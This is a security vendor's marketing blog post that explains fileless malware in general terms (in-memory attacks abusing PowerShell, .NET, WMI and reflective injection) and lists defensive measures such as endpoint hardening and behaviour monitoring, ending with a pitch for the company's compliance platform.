• Product
      • ROAR Platform
      • ZenComply
      • ZenRisk
      • ZenGRC Platform
      • Risk Intellect
      • Pricing
    • Solutions
      • By Industry
        • Technology
        • Financial Services
        • Hospitality
        • Healthcare
        • Government
        • Education
        • Retail
        • Media
        • Insurance
        • Manufacturing
        • Oil & Gas
      • By Framework
        • Popular
          • ISO
          • PCI
          • SOC
          • COSO
          • SSAE 18
        • Privacy
          • CCPA
          • GDPR
        • Health Care
          • HIPAA
        • Government
          • NIST
          • FedRAMP
          • FERPA
          • CMMC
          • FISMA
        • Finance
          • SOX
          • COBIT
    • Success
      • GRC Experts
      • Customer Success
      • Services
    • Resources
      • Resource Center
      • Reciprocity Community
      • Newsroom
      • Events
      • Blog
      • Customer Stories
      • Content Registry
    • Company
      • About Us
      • Contact Us
      • Careers
      • Leadership
      • Trust Center
      • Partners
    Try it free
      Get a Demo Try it free

        Key Targets for Fileless Malware

        Published September 9, 2021 • By Reciprocity • Blog
        Image

        Cybersecurity threats have proliferated for years, and that shows no sign of stopping. One estimate, for example, is that damages due to cybercrime will hit $10.5 trillion by 2025.

        One especially pernicious threat gaining new popularity: fileless malware.

        Fileless malware attacks are particularly dangerous because, unlike traditional malware, they involve no files to scan — and therefore are harder to detect by conventional endpoint protection tools.

        This article unpacks what fileless malware actually is, how bad actors launch fileless malware attacks, and how you can protect your data from these threats.

        What Is a Fileless Malware Attack?

        Malware (short for “malicious software”) is any intrusive software that can infiltrate computer systems to damage or destroy them or to steal data off of them. The most common types of malware attacks include viruses, worms, Trojans, and ransomware.

        Most malware attacks are file-based. This means threat actors use executable .doc, .zip, or .pdf files embedded with malicious code. The goal is to fool users into opening those files to introduce the malicious script into the organization’s network. The malware can then steal passwords, delete files, lock computers, pilfer data, and so forth.

        In contrast, fileless malware has no such file that users need to activate. Instead, this “memory-resident malware” operates from a victimized system’s memory. It also leverages existing vulnerabilities in a software program to infect it, take control, or steal data.

        Moreover, this malware can successfully achieve its goals even if the victim does nothing more than click on a malicious link or unknowingly visit a compromised website — usually following a phishing email or social engineering attempt.

        Yet another challenge is that fileless malware makes forensics difficult because it simply disappears when the infected system is rebooted.

        According to the Internet Security Report for Q4 2020, fileless malware attacks in 2020 surged by almost 900 percent over 2019, suggesting that fileless malware attacks are surging in popularity as an attack tool.

        Common Targets for Fileless Malware

        Although fileless malware didn’t really come into its own as a serious threat vector until 2017, it’s actually been around for much longer. Early examples include:

        • Frodo
        • Number of the Beast
        • The Dark Avenger
        • SQL Slammer
        • Stuxnet
        • UIWIX

        One of the most high-profile data breaches of 2017 — the Equifax breach that exposed the data of 147 million people — was also the result of a fileless malware attack.

        Fileless malware leverages trusted, legitimate processes running on the operating system to attack a victim system. Many attacks leverage standard Microsoft Windows processes and safe-listed applications such as:

        • PowerShell
        • .NET
        • Windows Management Instrumentation (WMI)

        Macros are another common threat pathway for fileless malware attacks.

        How Does Fileless Malware Work?

        Considered a “low-observable characteristics (LOC) attack,” a fileless malware infection goes straight into the machine’s memory without touching the hard drive. It may then perform a malicious activity such as data exfiltration, credential theft, lateral movement, reconnaissance, privilege escalation, and the delivery of malicious payloads.

        Types of Fileless Malware Attacks

        Some major fileless malware threats that organizations should be prepared for are:

        Reflective Self-injection (or Loading)

        A reflective loading fileless threat loads a portable executable (PE) directly from the victim system’s memory. Since the malware doesn’t load from the hard drive, it isn’t registered as a loaded module within the process. Therefore, it leaves no footprints that can be traced later. PowerShell is a commonly used application to load crafted scripts for PEs and execute fileless malware attacks.

        Reflective EXE Self-injection

        In this type of attack, a function or script loads an executable (EXE) file. Like a PE, the EXE also doesn’t get registered as a loaded module in the process, leaving no trace. Threat actors often leverage a PowerShell script to inject an EXE into the PowerShell process itself.

        Reflective DLL Remote Injection

        A crafted function or script is again leveraged to load a DLL without getting registered as a loaded module. The injection happens into a remote process and is not detected by endpoint monitoring tools, allowing attackers to launch a stealthy attack.

        Malicious Code Execution

        Here, a threat actor tries to execute malicious shellcode using the DotNetToJScript technique. This fileless approach allows the attacker to load and execute malicious .NET assembly from the system memory along with the help of .NET libraries exposed via COM. No part of the malicious .NET DLL or EXE touches the computer hard drive, so it remains undetected.

        5 Strategies to Prevent Fileless Malware Attacks

        Fileless malware attacks have a high success rate because they leverage common system tools, software, and applications. Even worse, signature-based prevention and detection methods cannot identify or detect them, giving threat actors the freedom to cause more mischief.

        Fortunately, one can prevent fileless malware attacks. The key is to leverage an active, holistic approach that incorporates multiple elements, including:

        Endpoint Hardening

        Fileless attacks originate at the endpoint, so it’s important to harden endpoints with security updates, patches, vulnerability remediation, and two-factor authentication. Advanced endpoint security solutions can provide vulnerability assessment, exploit and memory protection, and desktop firewall to further harden endpoints without affecting their functionality.

        Application Containment

        Blocking unauthorized applications and code from running on servers, desktops, and devices can lower the threat of fileless malware attacks. Further, a safe-listing security solution can separate the “good” software from the “bad” to prevent problems with accessing legitimate tools.

        Behavior Monitoring

        User behavior analytics (UBA) is a good way to identify hidden threats and increase the accuracy of security operations. UBA is also useful as a forensic analysis tool to investigate fileless malware attacks.

        Interactive Threat Hunting

        An endpoint detection and response (EDR) tool investigates unusual behaviors on endpoints. It also searches for and reveals footholds that may indicate an ongoing fileless attack.

        Centralized Security Management

        A unified platform that centralizes security management, monitoring, and control is essential to prevent fileless malware attacks. It streamlines security management through advanced visibility into the organization’s entire threat landscape.

        Stay Safe From Cyber Risks and Fileless Malware Attacks With ZenGRC

        The strategies discussed in this article are effective at preventing fileless malware attacks. Meanwhile, cyber threats are always evolving.

        Any organization’s security toolkit should include a comprehensive threat detection and mitigation platform like ZenGRC. ZenGRC can detect fileless malware threats and strengthen cybersecurity to minimize risk exposure.

        Contact us to talk to a cybersecurity expert at Reciprocity today to understand your organization’s vulnerability to fileless malware attacks and learn more about ZenGRC.

        Latest Blog

        View All
        Image
        Get a Head Start on Your PCI DSS v4.0 Overhaul

        Recommended

        Image
        How to Choose a Compliance Management Tool
        Image
        How to Assess and Improve Your Cybersecurity Posture
        Image
        How to Avoid the Common Risks of Implementing New Software

        GRC tips straight to your inbox

        Sign-up for the GRC Weekly Digest email featuring new blogs, GRC events, industry research, and more.

        Thank you for signing up for our newsletter! GRC Expertise is on its way!

        Recommended

        image
        Security

        10 Common Types of Phishing Attacks and How to Identify Them

        Read more
        image
        Security

        Top 5 Best Internal Controls for Cyber Risk Mitigation

        Read more
        image
        Risk

        How Deep Learning Can Be Used for Malware Detection

        Read more

        Get Cyber Risk Clarity Free and Easy

        ROAR Platform: Try it Free
        Reciprocity Logo
        Product
        • ROAR Platform
        • ZenComply
        • ZenRisk
        • ZenGRC Platform
        • Risk Intellect
        • Pricing
        Solutions
        • Industries
        • Frameworks
        Success
        • GRC Experts
        • Customer Success
        • Services
        Resources
        • Resource Center
        • Reciprocity Community
        • Newsroom
        • Events
        • Blog
        • Customer Stories
        • Content Registry
        Company
        • About Us
        • Contact Us
        • Careers
        • Leadership
        • Trust Center
        • Partners

        (877) 440-7971

        Contact Us

        (877) 440-7971

        Contact Us

        © 2022 All rights reserved

        Privacy Policy